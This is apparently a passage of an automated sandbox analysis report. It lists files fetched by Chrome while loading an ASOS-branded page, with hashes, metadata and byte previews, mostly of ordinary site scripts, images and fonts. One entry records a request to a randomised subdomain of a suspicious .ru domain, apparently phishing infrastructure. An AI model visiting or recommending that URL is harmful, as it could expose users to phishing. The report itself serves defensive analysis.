                                                                                                                                                                                                                                                                                      SHA1:82C3FA2F439105AFABC5C4967FD063DCBADAAC1C
                                                                                                                                                                                                                                                                                      SHA-256:641D06A33C26BCB862EFB7273FBDD98BD37927E73AA59D77CD18712053A1622D
                                                                                                                                                                                                                                                                                      SHA-512:5BEF95F37E606385E331806E20C0409EC877336EF9298B8D86236AE5A367A72E14994F96E0CB616ED376513EF8936769B177C4D8E8D729348B54D70689057830
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:(()=>{var e,t,r={40591:(e,t,r)=>{"use strict";var n={};r.r(n),r.d(n,{fetchClientNavigation:()=>ln,fetchCountry:()=>gn,fetchDefaultDeliveryCountry:()=>bn,fetchNavigation:()=>un,fetchPaymentProviders:()=>yn,fetchSitecoreBearerToken:()=>Sn,fetchSocialTags:()=>vn,fetchSuggestions:()=>hn,fetchTargetedContent:()=>jn,fetchTemplateFromBlobStorage:()=>xn,fetchWelcomeMessage:()=>On,getDeliveryOptions:()=>wn,sendEventToAlfred:()=>Cn});var o=r(31542);const i="asos",a="siteChrome",c="sdk",l="subscriptions",d="audience",u="_versionManifest",p="_initialStore",m="_initialBreadcrumbs",h="_tokenValues",g="_config",y="CLIENT_",f="bag",b="stc-welcome-message",v="userTookActionOnWelcomeMessage",w="resolvedDeliveryCountry",O="cappedPageCount",j="localStorageCacheError",S=(e,t)=>{const r=[];for(let n=0;n<localStorage.length;n++){const s=localStorage.key(n);s!==t&&s.startsWith(e)&&r.push(s)}r.forEach((e=>localStorage.removeItem(e)))},x=async function(e){const{cacheKeyPrefix:t,returnCachedOnDelegateFailure:r,r
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):2941
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.909276343163651
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:cYg3H1ESrRSL18k5JBbuRdf5wMO1olTpQG6Fq7Y+tEQz8eyZIz071:Jg3VESQek5JBWfwDYSFIOQz8G0x
                                                                                                                                                                                                                                                                                      MD5:3B3B7074D0DDCB23F3252C28322A4209
                                                                                                                                                                                                                                                                                      SHA1:27D894D07D5B998D8237D676A6C7B7D10FD0C192
                                                                                                                                                                                                                                                                                      SHA-256:E45294734EFD85FDC485835B30C844B6F40AF18A9C9B86D150F465880FF01FC0
                                                                                                                                                                                                                                                                                      SHA-512:99234E4F3E0681A657E07DA46221982C48E16CFE2485F21D34F5CD0F3EDE1910B6742075E63CE8D24ADC825E107346E4975D53FF4E00CCB7997D72811D305196
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/storesa/images/flags/nl.png
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB........7IDATx..{.T....=..swv..e..Pu5YP.AM......L.....6$.6.1..1..mj...Hi.15i...M..? .`...4..B.M.."..y.}..=.g...3.b.!3..s~......~..Eas....P.D.\.W.^.zu..5...d,b.v....BBQ..JG.)_..>..|.o..mA........f.[..K..lC.f6.9k.}Yf....6cu......|...AM._.l9...3.....i$Y.....n.0r;...n..Y..p.c.Q.q..Fq...#..b6.c..t:.'.9.rV..D+..i.#?...;d.(6cA....x..K.W.....Mf.....M..,H....q=.".9..%...dy..2.E.....<..Lo..h...`:...K.g.V7DH.....kdi.D..%..............l..........5...A.w7Z...%ha.G]I(3[_4t.4A.#......r\..yv..jGC....uw.gs......p.uX...|.i..4.L..s...Ph...._......_..9l.dl.(..(..e..........=r..u..]....F.......v...^.?a.w...1.g.E.s.,>b.E.F;............{Z..D....=.....h......\....$G uq. ..mY..&..Z.T3.Wc.}n.......];U?...-..I...._......`...R..........S7X.....i3.,.E......N.12..s.[.<.k....u......5v..{...Z....=s"g.x..1.j........].j1..Jx]w.<.b0.......:..5...l...c..-,......t.n...Bg.^..UG.G....el..D.,.1...@....hr!g..\r4.V..Je
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 44 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):61
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPljgtql/xl/k4E08up:6v/lhPCq17Tp
                                                                                                                                                                                                                                                                                      MD5:C25D4FF4FF288CF696E39B35C5530A38
                                                                                                                                                                                                                                                                                      SHA1:92D8EFEAE7AE538146A9217173A3DAF80710192D
                                                                                                                                                                                                                                                                                      SHA-256:3BC910F72113FE519AB98338EAD55529AFF507FA6B60F939ACC516DE1E23C1D4
                                                                                                                                                                                                                                                                                      SHA-512:DC8A9E8BCAE8CB5B62A70B6A9A18DDD80E56C86069023EE40EA8D9D8820251A8DA20D3D188DABC75FA6E4AA4DFA2ACB556BA6AF0AF211B44BFF168FCA33448DB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...,...O.............IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru/51494063466197438770eThrqYWGTFQAZGGVGCSLIRTIMTBZBRPYKHCCIVWRHXDMIQJYU
                                                                                                                                                                                                                                                                                      Preview:1
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (26334)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):26384
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.362940079689228
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:7CgTkWPMgNmomFNpKw612MtT19eYBTyu9Cjrm:rpkBrF/KjV5TpSK
                                                                                                                                                                                                                                                                                      MD5:3667B64516B460AE907CE815618207AB
                                                                                                                                                                                                                                                                                      SHA1:88A4E8491DBCF88BF76486534CAD0BD99192C614
                                                                                                                                                                                                                                                                                      SHA-256:2BDC31421C9AD184399B387B910AF5B7110732E2B3B532FD1EEA1E3ED4CFCF38
                                                                                                                                                                                                                                                                                      SHA-512:456AB64A42760E802405A4BE84215A4C832DFB07ED7EF973B88804479FEBA7815FD23A0BA2398DFC49BCA957A4618FD6BFE462F1A2E2B3CFEED884CB24B85B33
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/asos-ui/web-request/browser.es5.defc2d72.js
                                                                                                                                                                                                                                                                                      Preview:this.window=this.window||{},this.window.asos=this.window.asos||{},this.window.asos.webRequest=function(e){"use strict";var t=function(e,t,r){return t in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e};var r=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n};var n=function(e){if(Array.isArray(e))return r(e)};var o=function(e){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(e))return Array.from(e)};var i=function(e,t){if(e){if("string"==typeof e)return r(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);return"Object"===n&&e.constructor&&(n=e.constructor.name),"Map"===n||"Set"===n?Array.from(e):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?r(e,t):void 0}};var a=function(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")};var s=function(e){return n(e)
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (47671)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):47672
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.4016434300784555
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUen+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3Uesnpj
                                                                                                                                                                                                                                                                                      MD5:EC4B20037C896C5F60640105C6EA36B1
                                                                                                                                                                                                                                                                                      SHA1:A9A74169679305B6EF1B76470F5CB746D9420213
                                                                                                                                                                                                                                                                                      SHA-256:FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
                                                                                                                                                                                                                                                                                      SHA-512:1AD0209E6BEFE4444E62BFD01EA8FC5302674A047313908E963AFB787D83E572DB6AEF7EFEBB6D294A0310DECD51E54C17ACE28E7CDF651BB588AE4A17030102
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):5930
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.947840790077426
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:npymT40wlsILs2JzRls5aeu1iVp7GHGa6AyEtjjvjfjJjMZZ2p88A:MlRLtJznuBaiVpC6vE1jLbJEKA
                                                                                                                                                                                                                                                                                      MD5:EA15AD8B901863FE058078C8BB5528CF
                                                                                                                                                                                                                                                                                      SHA1:E1C6677574F90480C5AF022D828C9EFA355C5188
                                                                                                                                                                                                                                                                                      SHA-256:A0A6A1E47631A7017527CB8325BD1F284C3A54B877D822E041C4AA49A83A5B0B
                                                                                                                                                                                                                                                                                      SHA-512:7BF0813B357FFDE95B5F2DE459251470175E952C54F3E23CF90A4C06BD53A5143A127951C2D7FF14AAB4A5075B594241760A6CC043BAB8DB5E59315A2FE0FEFE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/sitechromepublisher/oneTrust/13.0.0-6ca9c0c7-69/consent/908f7fca-dbc5-4b3a-8f6b-ed734de0cb52/908f7fca-dbc5-4b3a-8f6b-ed734de0cb52.json
                                                                                                                                                                                                                                                                                      Preview:{"CookieSPAEnabled":false,"CookieSameSiteNoneEnabled":false,"CookieV2CSPEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"LOCAL","Version":"202401.2.0","OptanonDataJSON":"908f7fca-dbc5-4b3a-8f6b-ed734de0cb52","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","BulkDomainCheckUrl":"https://cookies-data.onetrust.io/bannersdk/v1/domaingroupcheck","RuleSet":[{"Id":"018f60e2-bdf7-77a2-ae44-3ef34a582931","Name":"TCF: Reject All","Countries":["de","fi","be","dk","it","gr","fr","hu","es","at","gb","ie","nl"],"States":{},"LanguageSwitcherPlaceholder":{"it-it":"it-it","ru-ru":"ru-ru","pl-pl":"pl-pl","de-de":"de-de","default":"en-gb","nl-nl":"nl-nl","en-us":"en-us","sv-se":"sv-se","es-es":"es-es","en-au":"en-au","da-dk":"da-dk","fr-fr":"fr-fr"},"BannerPushesDown":false,"Default":false,"Global":false,"Type":"IAB2V2","UseGoogleVendors":true,"VariantEnabled":false,"TestEndTime":null,"Variants":[],"
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (39065)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):39144
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.29609149633264
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:giFeT5LfJJU0buCauuAuoqtyIMEgbwmzqZl0khSYADhZBGmmcfK:giFqfpauuAgyfbQl0jYAXK
                                                                                                                                                                                                                                                                                      MD5:4EB0F26BEEA5BC3779D90A27AC8EDB62
                                                                                                                                                                                                                                                                                      SHA1:7EC8DEBBCDB7882226AF572A55AB5956184E20F7
                                                                                                                                                                                                                                                                                      SHA-256:4EA88C3B946290B7117C0941C91AE01DBD7F294AB8C4C359775371379436AA81
                                                                                                                                                                                                                                                                                      SHA-512:07E98FB0EEFA551A9B27AE551442DCD48EA592F5DCEB2B508A603ACAB613E15B10C4DEF46215F13E66D783C460A28265C82051F59B776849DD21E0AD9465340B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/sitechromepublisher/client.sitechrome.deferred.13c30ac023f768c61047.css
                                                                                                                                                                                                                                                                                      Preview:.osdMOxg{--icon:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3E%3Cpath fill='%23fff' d='M9.97 8.274 2.335.637.637 2.334 8.274 9.97.637 17.607l1.697 1.697 7.637-7.636 7.636 7.636 1.697-1.697-7.636-7.636 7.636-7.637L17.607.637 9.971 8.274z'/%3E%3C/svg%3E");cursor:pointer;margin:0 5px;-webkit-mask-size:19px;mask-size:19px;padding:0 16px}.osdMOxg:hover{background-color:var(--1cf22is)}.FfmKyt0{display:block;height:50px;left:0;-webkit-mask-position:15px center;mask-position:15px center;-webkit-mask-size:20px 20px;mask-size:20px 20px;position:absolute;width:50px}.Mlh3INa{background-color:initial;background-image:var(--icon);background-position:15px;background-repeat:no-repeat;background-size:20px 20px}.pggyrBd{--icon:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3E%3Cpath fill='%23fff' d='M14 6a4 4 0 1 0-8 0 4 4 0 0 0 8 0zm2 0A6 6 0 1 1 4 6a6 6 0 0 1 12 0zm-6 9c-3.068 0-5.67 1.223-7.03
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:1
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2438
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.883569731212677
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:N1jg47QuDeR7PoiVtoZ2XwmSfLQ3yHnNe/HNyyDo0GnRn+Ekpq:N1jg47Z6LoiUZOuDHnNe/tyao0GnAbc
                                                                                                                                                                                                                                                                                      MD5:E6FBABBCD80570A9DFA0386C25FA2C08
                                                                                                                                                                                                                                                                                      SHA1:D6B62AE10B83FE728788BCC00ED362847E1DF566
                                                                                                                                                                                                                                                                                      SHA-256:B7731EE671044B5581899B859A98227365A32ADBBBCDDF652BBDBED8E4F0DFDE
                                                                                                                                                                                                                                                                                      SHA-512:A80A7564C7280C0F3FE96FA0A697DD4C48394B0DF3C4B5F187D19EED07FAB3D35879F423B72A069963478B833E54C6555C18D7AF951384F2D48CC5E6412CCE52
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB........@IDATx...oTU...s.`ZZZZ..@.%...&,L}DP4.PcpK.nt.....n\.H\..H.....G....4..."H.BK[.....e~....{g.)3.G...<~..{^s..\F.f.k.?....t....777.N.:...3!.{Y.IO..fI.j.....R..H.K...../.....3..699..........333[.\Q..l}*.c.9.@..K..vi..+....f"E.A.... .|..RX..............&..Y.r.$..._kk.x.'.$..9.%P2Z..7..iY..eeV..-!.s.....Y...2...'.%3......W...'o.......&...].........b./qW..K.-(.Y.:. ..\.c..I..../o..7.'..|-_k.pH.h;%.....p...o.....Gz{{...E@T..iQ:.j9.T....k..d....N6.^......;O..s.....f....Jww.p..J.Z...SZ*..f.*."...|~...c.}..*$./ep...nJ..!........o.~.....j..SW....H...>i.n.|.g0\%..+..)}$w>>".?...j.*..A.|x1...A. ....._...O.^m....E.h}W....L.......Fur.:.-_.~.<>>..>.+>.;..Ri......z....&$.....^+Iu...*...x.......-h.$....}....of$3.#.Y.+u.d~9.P....hA.......^....93...-.&8.&Mq.\6....hA.........tFd.s.[.O.2.nA...eX4..MhCc........9......n.5..~BMz... .5j.X. -.a9..n[*`...fhB...h..:..xP..b....i...........hZW.jM...r@.V...:......M...t%..h.ch.~".>
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 89 x 60, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):61
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.002585360278503
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlUrlvzoyxl/k4E08up:6v/lhPiJ17Tp
                                                                                                                                                                                                                                                                                      MD5:C7D03E8C8ECFB5598505501A33E5E8FC
                                                                                                                                                                                                                                                                                      SHA1:8962F8D81160B27764FE40747263CA251C00FB75
                                                                                                                                                                                                                                                                                      SHA-256:B04FCBA4CB75493F6AB416B0A2825318F7FD41C5DD3810EA02819A6CAB7D940B
                                                                                                                                                                                                                                                                                      SHA-512:C111D9680023E8523833D1A17EE4803763EF7FB1E344B6B22FE391B341E7F8D4A6847472B1A1C109CDCE23821FB44A16EC4309354FFC59B54C551D6A42BD44CD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d7d4685edbf2e64/1729807604264/bGQz0E0r8tNdFNx
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...Y...<......P......IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (4450)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4522
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.306364650524668
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:vSIm3eWWY4emHvJwe+QRQJCNuN2W2K2EXR5hDV2OmGi7kA2Wn6:vIgZhwepRQYgYlhEXR5hDVEGiF2Wn6
                                                                                                                                                                                                                                                                                      MD5:3C8F93FEC24C564BD9DDFDA68827666A
                                                                                                                                                                                                                                                                                      SHA1:968CA6A78637C83D539D5603BF8FDAFD72C1E4A6
                                                                                                                                                                                                                                                                                      SHA-256:EE6F5A3E3C885FEDD52B015CAB0F1847A86805DCE43723C9F6550D98BC2FCA03
                                                                                                                                                                                                                                                                                      SHA-512:4B07C8D575FCF286C734E85CF336821D1EECD2093838BB9394CF76B3CD7CD6811E75D79581ECBA80961A8AD605525123DC94CA859256CEF846F4EF1491F3B927
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:// 1.0.572.require(["jquery"],function($){function onCarouselAction(){var overrides;void 0===window.analyticsCarouselAction&&(s=s_gi(s.account),(overrides={}).linkTrackVars=commons.setLinkTrackVars(["prop40"]),overrides.linkTrackEvents=commons.setLinkTrackEvents(["event120"]),s.prop40=(arguments[1].carouselType+"|"+arguments[1].componentName).toLowerCase(),s.events="event120",s.tl(!0,"o","homepage|"+arguments[1].context,overrides),window.analyticsCarouselAction=1)}var commons=new CommonAnalytics({"tracking.homePage.carouselAction":function(){},"tracking.homePage.pageLoad":function(){}});window.asos.eventBus.emit("analytics-ready");window.asos.eventBus.addListener("tracking.homePage.carouselAction",onCarouselAction),$(window).on("tracking.homePage.carouselAction",onCarouselAction),__trackingData={},window.asos&&window.asos.contentTargeting&&document.body.querySelectorAll("[data-targeted-content-item]").length?window.asos.contentTargeting.subscribe(function(data){__trackingData.targeting
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):5000
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.953749053207191
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:DW8NGbKMVL4GD+NErN6yjWMwgTHmL7Y0b8JN/opm4+h6xhcVLlwKSPR12p:DWIMVL9D73JIHb4opmt6f2Lm51I
                                                                                                                                                                                                                                                                                      MD5:3E5F5806E1B496D0A85BF8D15CB3AB00
                                                                                                                                                                                                                                                                                      SHA1:70D14CD37829384584C4A1114D8A2C244795E709
                                                                                                                                                                                                                                                                                      SHA-256:7C9F22AE56B4C78410EEA799E85D1E2CFD46330C55F8C629D5E412852982A295
                                                                                                                                                                                                                                                                                      SHA-512:A7646B40CAB91EA57206FFDA97AE61656D13DD549776F1E8ACE8F346E511A6969E4A9AC974B8D7570E3B3D81A959DE8F3AB78C36F4B2430E397D762B67CFFFA3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB........BIDATx...|T......{&.L..cB....)P...V.).......g........G}t.U..j..h-U....~D-..Q^..(.T !1/&..$.~.{......L.'.;w.>..{......#.4...o.#4%.."...$.,...$dZ.lN.../B.k...b..b5/&..6..K....fL5..{v..0..bHN..A..N...?7A\.......-.K.A%~ ..!..`../..~H.eY....F./.1$.....".v.8.K.A..G...uLY...:...9.Vt./...9.z5.o...._..i<.7X.../.n.F.n..r...R.B.Y...A.F.,C$.F..(-..C....9(.i....O.zp.O....p/.t....>.-.......}.B..>H 7.X(..fK.4..!......RT..@...b.9.lmd...o..=_... .IP..Jr..../..U+NU.N....?...g._..cp...B....$kt..I.ay........o...D..Z.[B...v....A_z...;.-......&.....kQ.v..O..Ik.....!.x7..=......(...Q.E.}$K.t.^..]..7v2.>)mWcB^#.+.......F.x(Kw....4.G.0.2..:Q.N..*L*mD.=*......*..p.J.\.$..o.,......rB..aR...5T....|.RD9..f...|....zx...9WaO.@.9`.ly..nfx\.fx.*..H=..0...`.6PK.P.K...{*..a......ub.`..E...1....h...}..m.[..H..cX'.U.#..:...K.q.rQ..-...m.aKT.:...;..c:1.$7#...TJ.f.F....;Gg'.!7....*l.. W.Dt..0..<..y..u.c....n....4.h..fa..2<.a.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 91700, version 1.590
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):91700
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997578233786376
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:1536:moJdZk4qRq8nhA0K46olDtLWozaRQGWzoEr9+yIVhld/ghu8SoRSO:JJkRPAtHolIozaRQzzt9CmuN2f
                                                                                                                                                                                                                                                                                      MD5:2DADBB3C03C1CDF1491621ADCAA9EA84
                                                                                                                                                                                                                                                                                      SHA1:8773EFEC2A3A7235FE0FB6E700D113D9401CB6AF
                                                                                                                                                                                                                                                                                      SHA-256:BB391EE077B5B90859C5EBC8CD3AC6B5D6D90ADF15AF75E3CF04EE1690B90821
                                                                                                                                                                                                                                                                                      SHA-512:455C314CAFAE03601A93803961DC454CF2B12A8FC775735EC9417415058F0C646D103E339966A0E1E45BD05AE1857B29AD8946B8BAB90FA23FC2460AB09A003A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/fonts/futura-pt/book.1bb391ee.woff2
                                                                                                                                                                                                                                                                                      Preview:wOF2......f4.......h..e....N.......................b..t..{.`...."..a.....\........6.$..\..`.. ..+..u...[.Y...2.[.A..f.&j...>._...G.9....i..N_...6...m;ZV..k...JK>........6..y#..A.....,M...SU2.u.....Q.:$+....UMj0...JL...4.l^.L...z.......\.i...f.;.UX.........0....!........&..j...../..p..B..f.T.......C{.Z.URF/G{Ew...m..n.[.......z1j/..\.ZX.^.zf...-..>....#79.QY.-7dyg6..#.{im.+.#_..d.vW.............=...kaB....y...../.UZ...)=}.......I`9V..$Jdx.72.]O.HJ......,Jr...U.R...`.0..~d....8..i0.]...}..........Lg3lKw.......Z.....W(.....rfo.L...>.!.s...!..M.+..E`...jq\..mI.r2.7;PO..r.&..Q........ck.....O..............7..q....V#.E.....0c.>..#..J.JR.0.L5.....[r..SJ..oN.......m_....q.> .0..j.dB;..)].....>.D@M...YZ..~!.......6..GY."*"* uX.....k....kc...E.*..\..v.J....0...l.xc}B</.l.V[..?..sI..5).....Tbc..F...0p..m...a. 6.LPPQ.*$.. f`$.X...X........].._b.....;].+."......n.?....=...4..A...0w.I*...62L[.a..F....!....*D.T.....~* .T:.iOnd..)7....j[.C./.+.2..\..b..d
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
